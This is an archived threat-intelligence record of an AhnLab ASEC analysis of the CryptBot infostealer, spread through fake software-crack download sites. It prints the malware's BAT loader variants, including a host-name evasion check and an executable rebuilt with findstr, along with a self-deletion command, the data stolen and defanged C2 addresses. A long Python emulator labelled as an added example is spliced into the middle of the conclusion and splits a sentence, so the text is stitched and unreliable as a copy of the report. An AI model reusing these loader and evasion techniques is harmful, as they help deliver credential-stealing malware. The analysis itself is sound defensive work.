{
	"id": "01075449-386c-497e-998a-3c033ad82b57",
	"created_at": "2026-04-06T00:13:35.20355Z",
	"updated_at": "2026-04-10T13:11:56.920709Z",
	"deleted_at": null,
	"sha1_hash": "7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb",
	"title": "CryptBot Infostealer Constantly Changing and Being Distributed - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 950378,
	"plain_text": "CryptBot Infostealer Constantly Changing and Being Distributed -\r\nASEC\r\nBy ATCP\r\nPublished: 2021-07-29 · Archived: 2026-04-05 17:02:26 UTC\r\nCryptBot is an infostealer distributed through malicious websites disguised as software download pages. Many such websites have been created, and several of them appear on the first page of search results when keywords such as cracks or serials of popular commercial software are entered, so a large number of users download and run the malware. The sample is also packed as an SFX archive, which makes it difficult to distinguish malicious files from normal ones, and it changes multiple times a day.\r\nBecause the websites pose as download pages, users are convinced the file is legitimate and run the malware repeatedly even when V3 products block it, which calls for extra caution. AhnLab has been publishing blog posts on this malware to raise awareness of the danger.\r\nhttps://asec.ahnlab.com/en/26052/\r\nPage 1 of 10\n\nFigure 1. Sample of CryptBot distribution website\r\nCryptBot Infostealer Being Distributed in Different Forms\r\nCryptBot Infostealer Distributed Through Phishing Sites\r\nAs shown in the figure below, the malware is compressed in multiple layers. The innermost archive contains a txt file with the password.\r\nFigure 2. Compressed file downloaded from malicious website\r\nWhen the malware is run, it creates folders with names such as 7z.SFX.xxx and IXPxxx.TMP under the %temp% path and drops the files needed for the infection into them. File names and extensions differ in every variant. The dropped files are as follows.\r\nFigure 3. Dropped files\r\nBAT script (Far.vsdx)\r\nAutoit script (Impedire.vsdx)\r\nEncrypted CryptBot binary (Vento.vsdx)\r\nAutoit executable (Copre.vsdx)\r\nThe malware runs the BAT script after creating the files. 
See below for the structure of the script.\r\nFigure 4. BAT script\r\nOne thing to note about the script is that it changes periodically. Because it is easy to modify, the attacker alters the pattern by slightly changing the syntax while keeping the functionality. The following table lists the dates on which the BAT script changed in CryptBot samples collected over about a month; as it shows, the interval between changes has become shorter.\r\nScript file  Date of change\r\nConfronto.jar  June 16th, 2021\r\nAprile.accdr  July 6th, 2021\r\nVirtuoso.bmp  July 16th, 2021\r\nOrti.html  July 17th, 2021\r\nPensai.wmz  July 21st, 2021\r\nLume.eml  July 22nd, 2021\r\nRitroverai.aiff  July 23rd, 2021\r\nPovera.ppsm  July 24th, 2021\r\nIdeale.dotx  July 25th, 2021\r\nAffonda.wms  July 26th, 2021\r\nEsaltavano.tiff  July 28th, 2021\r\nTable 1. Date of changes\r\nThe following table shows the main changes. While the function of the BAT script itself did not change, the syntax and the environment variables it uses changed slightly.\r\nAprile.accdr\r\nif %userdomain%==DESKTOP-QO5QU33 exit 2\r\n\u003cnul set /p = \"MZ\"\u003e Ripreso.exe.com\r\nfindstr /V /R \"^AGbW…xiSv$\" Fianco.accdr \u003e\u003e Ripreso.exe.com\"\r\ncopy Fra.accdr B\r\nstart Ripreso.exe.com B\r\nping 127.0.0.1 -n 30\r\nVirtuoso.bmp\r\nSet PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp=DESKTOP-Set zVqJPft=QO5QU33\r\nSet bizASaCEemlwdhJhU=MZ\r\nif %userdomain%==%PRehIgqfWNWhFAxNgjgzQhcGBgikLpocQQTp% exit 8\r\n\u003cnul set /p = \"%bizASaCEemlwdhJhU%\"\u003e Compatto.exe.com\r\nfindstr /V /R \"^viIO…hWwHg$\" Baciandola.bmp \u003e\u003e Compatto.exe.com\"\r\ncopy Corano.bmp w\r\nstart Compatto.exe.com w\r\nping 127.0.0.1 -n 30\r\nLume.eml\r\necho XrHAkUeB\r\necho XrHAkUeB\r\nif %userdomain%==DESKTOP-QO5QU33 exit 2\r\n\u003cnul set /p = \"MZ\"\u003e Mese.exe.com\r\nfindstr /V /R \"^VtHMWSo…DuPlDDuA$\" Giorni.eml \u003e\u003e Mese.exe.com\"\r\ncopy 
Scossa.eml h\r\nstart Mese.exe.com h\r\nping 127.0.0.1 -n 30\r\nEsaltavano.tiff\r\nSet PaWlwDiebzBsRrpYjIjVHC=DESKTOP-Set hQfTrWvlasdWKZ=QO5QU33\r\nif %computername%==%PaWlwDiebzBsRrpYjIjVHC% exit\r\nSet OzhMvyIxp=MZ\r\n\u003cnul set /p = \"%OzhMvyIxp%\" \u003e Hai.exe.com\r\nfindstr /V /R \"^fqCO…pHiJlm$\" Affettuosa.tiff \u003e\u003e Hai.exe.com\"\r\ncopy Saluta.tiff S\r\nstart Hai.exe.com S\r\nping localhost -n 30\r\nTable 2. Changed content\r\nAs the commands in Table 2 show, the BAT script first compares the host name (%userdomain% or %computername%) with a fixed value and exits if it matches. It then rebuilds the Autoit executable under the name [random name].exe.com: set /p writes the MZ signature to the file, and findstr /V appends every line of the dropped carrier file that does not match the given regular expression. Next it copies the Autoit script to a one-character filename and starts the rebuilt executable with that script as its argument; the final ping command acts as a delay of roughly 30 seconds.\r\nFigure 5. Executed Autoit process\r\nThe Autoit script decrypts the encrypted binary, copies it into memory, and executes it there.\r\nFigure 6. Decrypted CryptBot malware binary\r\nWhen the CryptBot binary loaded in memory runs, it scans for the directories of certain anti-malware products. If such a directory exists, the binary generates a random number and sleeps for that amount of time. This delayed execution is presumably meant to evade detection.\r\nFigure 7. Scan code for directories of anti-malware products\r\nThe code then checks whether a particular directory exists. If it already does, the malware treats this as a duplicate execution or an already infected system, terminates, and deletes itself. The name of the directory differs for each sample.\r\nFigure 8. Duplicate execution scan\r\nFor self-deletion, the malware runs the following cmd command through the ShellExecuteW function.\r\n/c rd /s /q %Temp%\\[name of the created directory] \u0026 timeout 2 \u0026 del /f /q \"[malware execution path]\"\r\nTable 3. 
Command for self-deletion\r\nWhen the malware begins its malicious activity, it creates a randomly named directory in %TEMP% and collects various user information. The sample collects the following.\r\nBrowser information (Chrome, Firefox, and Opera)\r\n  Cookies\r\n  Saved form data\r\n  Saved account names and passwords\r\nCryptocurrency wallet information\r\nSystem info\r\n  Name of executed sample\r\n  OS and country information\r\n  User account and PC name\r\n  Hardware information\r\n  List of installed programs\r\nScreenshots\r\nFigure 9. Collected data of accounts and passwords saved in browsers\r\nFigure 10. Collected data of system info\r\nWhen collection is complete, everything in the created directory is compressed into a password-protected ZIP file and sent to the C2. The C2 URLs mainly use frequently changing .top domains. A CryptBot sample usually has 3 C2s in total: 2 for sending the stolen information and 1 for downloading additional malware.\r\nFigure 11. C2 Transmission Code\r\nWhen the C2 transmission is complete, the malware accesses a particular URL, downloads additional malware, and runs it. The downloaded payload is usually a ClipBanker-type malware.\r\nFigure 12. Code for downloading and running additional malware\r\nIf a system is infected by this malware, confidential information such as account names, passwords, and cryptocurrency wallets is leaked. 
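The loader behaviour that stays the same across every script in Table 2 (the host name check, the MZ prefix written with set /p, the findstr /V rebuild of the Autoit executable, the copy of the script to a one-letter name, the start command and the ping delay) can be pulled out of a new variant without running it. The Python script below is an added example and not code from the ASEC post: it emulates only the cmd.exe subset those scripts use, feeds it two constructed scripts modelled on the Aprile.accdr and Esaltavano.tiff variants together with constructed in-memory dropped files (the junk line AGbWxiSv, the fake PE bytes and the host name VICTIM-PC are all made up), and checks that the rebuilt file is the original executable with its MZ signature restored. It models only the anchored-literal findstr pattern form seen in the samples and keeps each surviving line's own terminator; real findstr may differ on that detail.

```python
# Added example, not code from the ASEC post: a static emulator of the cmd.exe subset
# used by the CryptBot BAT loaders in Table 2. Nothing runs; files are a dict of bytes.
import re
CRLF = bytes([13, 10])

def expand_vars(text, env):
    # %NAME% expansion as in a batch file: case-insensitive, undefined -> '', %% -> %
    return re.sub('%([^%]*)%', lambda m: '%' if m.group(1) == '' else
                  env.get(m.group(1).upper(), ''), text)

def split_redirect(cmd):
    # Split at the first '>' or '>>' outside double quotes: (cmd, target, append)
    quoted = False
    for i, ch in enumerate(cmd):
        quoted ^= ch == '\"'
        if ch == '>' and not quoted:
            append = cmd[i + 1:i + 2] == '>'
            return cmd[:i], cmd[i + 1 + append:].strip(), append
    return cmd, None, False

def findstr_v(carrier, pattern):
    # findstr /V /R with an anchored literal: drop lines equal to the literal and keep
    # every other line with its own terminator (real findstr is not modelled exactly)
    if not (pattern.startswith('^') and pattern.endswith('$')):
        raise ValueError('only ^literal$ patterns are modelled')
    literal = pattern[1:-1].encode()
    return b''.join(ln for ln in carrier.splitlines(keepends=True)
                    if ln.rstrip(CRLF) != literal)

def run_loader(script, files, env):
    # Walk the script, mutate the in-memory files, record the invariant features.
    rep = dict(host_checks=[], exit_code=None, rebuilt=None, header=None,
               pattern=None, carrier=None, launch=None, delay_s=0)
    for raw in script.splitlines():
        line = expand_vars(raw.strip(), env)
        if not line or line.lower().startswith('echo '):
            continue  # echo lines are padding only
        cmd, target, append = split_redirect(line)
        tokens = [t for t in cmd.split() if not t.startswith('<')]  # drops <nul
        verb = tokens[0].lower()
        if verb == 'set' and tokens[1].lower() == '/p':
            # <nul set /p =MZ> file : the prompt text becomes the file's first bytes
            rep['header'] = cmd.split('=', 1)[1].strip().strip('\"')
            files[target], rep['rebuilt'] = rep['header'].encode(), target
        elif verb == 'set':
            # everything after the first '=' is the value, even a second 'Set ...=...'
            name, value = cmd.split(' ', 1)[1].split('=', 1)
            env[name.strip().upper()] = value
        elif verb == 'if':
            # if LEFT==RIGHT exit [code] : the host name check (case-sensitive)
            left, rest = cmd[3:].split('==', 1)
            right, _, action = rest.partition(' ')
            rep['host_checks'].append(right)
            words = action.split()
            if left.strip() == right and words[:1] == ['exit']:
                rep['exit_code'] = int(words[1]) if len(words) > 1 else 0
                break
        elif verb == 'findstr':
            _, rep['pattern'], rest = cmd.split('\"', 2)
            rep['carrier'] = rest.split()[0]
            data = findstr_v(files[rep['carrier']], rep['pattern'])
            files[target] = (files.get(target, b'') if append else b'') + data
        elif verb == 'copy':
            files[tokens[2]] = files[tokens[1]]  # Autoit script under a 1-letter name
        elif verb == 'start':
            rep['launch'] = tokens[1:]
        elif verb == 'ping':
            rep['delay_s'] = int(tokens[tokens.index('-n') + 1])  # crude sleep
    return rep

# Constructed inputs (not the real dropped files): junk line, fake PE body without
# its MZ signature, and the carrier file with junk lines mixed into the body.
JUNK = 'AGbWxiSv'
PE_BODY = bytes([0x90, 0, 3, 0]) + CRLF + b'constructed PE body after the MZ signature'
CARRIER = JUNK.encode() + CRLF + PE_BODY[:6] + JUNK.encode() + CRLF + PE_BODY[6:]
PLAIN_VARIANT = '''if %userdomain%==DESKTOP-QO5QU33 exit 2
<nul set /p = \"MZ\"> Ripreso.exe.com
findstr /V /R \"^AGbWxiSv$\" Fianco.accdr >> Ripreso.exe.com
copy Fra.accdr B
start Ripreso.exe.com B
ping 127.0.0.1 -n 30'''
OBFUSCATED_VARIANT = '''echo XrHAkUeB
Set PaWlwDiebzBsRrpYjIjVHC=DESKTOP-QO5QU33
if %computername%==%PaWlwDiebzBsRrpYjIjVHC% exit
Set OzhMvyIxp=MZ
<nul set /p = \"%OzhMvyIxp%\" > Hai.exe.com
findstr /V /R \"^AGbWxiSv$\" Affettuosa.tiff >> Hai.exe.com
copy Saluta.tiff S
start Hai.exe.com S
ping localhost -n 30'''

def analyse(script, host='VICTIM-PC'):
    # VICTIM-PC is made up; DESKTOP-QO5QU33 is the value the samples compare against
    files = {'Fianco.accdr': CARRIER, 'Affettuosa.tiff': CARRIER,
             'Fra.accdr': b'constructed Autoit script', 'Saluta.tiff': b'constructed Autoit script'}
    rep = run_loader(script, files, {'USERDOMAIN': host, 'COMPUTERNAME': host})
    rep['rebuilt_ok'] = rep['rebuilt'] is not None and files[rep['rebuilt']] == b'MZ' + PE_BODY
    return rep

if __name__ == '__main__':
    for host in ('VICTIM-PC', 'DESKTOP-QO5QU33'):
        print(host, analyse(PLAIN_VARIANT, host), analyse(OBFUSCATED_VARIANT, host), sep=chr(10))
```

Run as a script it prints the reports for a victim host and for a host named DESKTOP-QO5QU33, where both variants exit before rebuilding anything. To triage a real sample, pass the BAT text and a dict of the dropped files read as bytes to run_loader; the report then gives the compared host name, the carrier and junk pattern, the rebuilt executable name and the script it is started with, and the rebuilt bytes can be carved from the dict without ever executing the loader.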
Secondary damage exploiting the leaked information is highly likely, so users need to take caution.\r\nAhnLab’s anti-malware software, V3, detects and blocks the malware under the following aliases:\r\nTrojan/Win.CryptLoader.XM122\r\nTrojan/BAT.CryptLoader.S1612\r\nTrojan/BAT.CryptLoader.S1610\r\nWin-Trojan/MalPeP.mexp\r\nMD5\r\n58774ece556b0a1e01443ea1c3c68e5a\r\nc2bc3bef415ae0ed2e89cb864fff2bfc\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ewais32[.]top/index[.]php\r\nhttp[:]//gurswj04[.]top/download[.]php?file=lv[.]exe\r\nhttp[:]//morers03[.]top/index[.]php\r\nhttp[:]//morxeg03[.]top/index[.]php\r\nhttp[:]//smaxgr31[.]top/index[.]php\r\nSource: https://asec.ahnlab.com/en/26052/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/26052/"
	],
	"report_names": [
		"26052"
	],
	"threat_actors": [],
	"ts_created_at": 1775434415,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.pdf",
		"text": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.txt",
		"img": "https://archive.orkl.eu/7f50ac5f1888c6ca5a06ed1945b9b80e1f26cafb.jpg"
	}
}